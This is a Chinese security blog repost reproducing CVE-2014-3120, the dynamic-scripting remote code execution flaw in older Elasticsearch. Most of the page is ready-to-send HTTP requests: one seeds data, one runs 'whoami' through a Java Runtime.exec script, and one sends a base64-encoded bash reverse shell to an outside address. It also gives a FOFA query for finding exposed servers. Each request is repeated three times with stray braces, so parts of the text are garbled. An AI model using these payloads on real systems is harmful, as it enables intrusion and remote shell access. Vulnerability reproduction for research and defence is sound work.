-CVE-2014-3120 ElasticSearch 命令执行漏洞

09313

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-CVE-2014-3120 ElasticSearch 命令执行漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

Elasticsearch向使用者提供执行脚本代码的功能,支持mvel, js,groovy,python,和native语言,默认脚本语言为mvel。由于mvel语言功能较为强大,可以直接执行java代码,而且官方默认没有关闭用户可通过http操控这一功能的接口(script.disable_dynamic),从而导致恶意用户可以通过这个功能远程执行任意Java代码。

图片[1]--CVE-2014-3120 ElasticSearch 命令执行漏洞-安全小天地

0x03 漏洞复现

漏洞影响:ElasticSearch 1.2之前的版本

FOFA:“ElasticSearch”

1.利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据

POST /website/blog/ HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
{
    \"name\": \"colleget\"
}
POST /website/blog/ HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

{
    \"name\": \"colleget\"
}
POST /website/blog/ HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

{
    \"name\": \"colleget\"
}
图片[2]--CVE-2014-3120 ElasticSearch 命令执行漏洞-安全小天地

2.执行系统命令whoami

POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
{
    \"size\": 1,
    \"query\": {
      \"filtered\": {
        \"query\": {
          \"match_all\": {
          }
        }
      }
    },
    \"script_fields\": {
        \"command\": {
            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"whoami\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"
        }
    }
}
    }
}
POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372

{
    \"size\": 1,
    \"query\": {
      \"filtered\": {
        \"query\": {
          \"match_all\": {
          }
        }
      }
    },
    \"script_fields\": {
        \"command\": {
            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"whoami\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"
        }
    }
}
    }
}
POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372

{
    \"size\": 1,
    \"query\": {
      \"filtered\": {
        \"query\": {
          \"match_all\": {
          }
        }
      }
    },
    \"script_fields\": {
        \"command\": {
            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"whoami\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"
        }
    }
}
    }
}
图片[3]--CVE-2014-3120 ElasticSearch 命令执行漏洞-安全小天地

3.反弹shell

POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
{
    \"size\": 1,
    \"query\": {
      \"filtered\": {
        \"query\": {
          \"match_all\": {
          }
        }
      }
    },
    \"script_fields\": {
        \"command\": {
            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"bash -c {echo,YmFaaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc1MzIgMD4mMQ==}|{base64,-d}|{bash,-i}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"
        }
    }
}
    }
}
POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372

{
    \"size\": 1,
    \"query\": {
      \"filtered\": {
        \"query\": {
          \"match_all\": {
          }
        }
      }
    },
    \"script_fields\": {
        \"command\": {
            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"bash -c {echo,YmFaaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc1MzIgMD4mMQ==}|{base64,-d}|{bash,-i}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"
        }
    }
}
    }
}

POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 372

{
    \"size\": 1,
    \"query\": {
      \"filtered\": {
        \"query\": {
          \"match_all\": {
          }
        }
      }
    },
    \"script_fields\": {
        \"command\": {
            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"bash -c {echo,YmFaaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc1MzIgMD4mMQ==}|{base64,-d}|{bash,-i}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"
        }
    }
}
    }
}
图片[4]--CVE-2014-3120 ElasticSearch 命令执行漏洞-安全小天地
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
------本文已结束,感谢您的阅读------
THE END
技术教程
# 漏洞复现# cve# elasticsearch# 命令执行# CVE-2014-3120
喜欢就支持一下吧
点赞13 分享
Finger rift,twisted in the love.
如果你为着错过夕阳而哭泣,那么你就要错群星了
C语言教程的头像,网络安全爱好者中心-神域博客网
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

文章目录
文章目录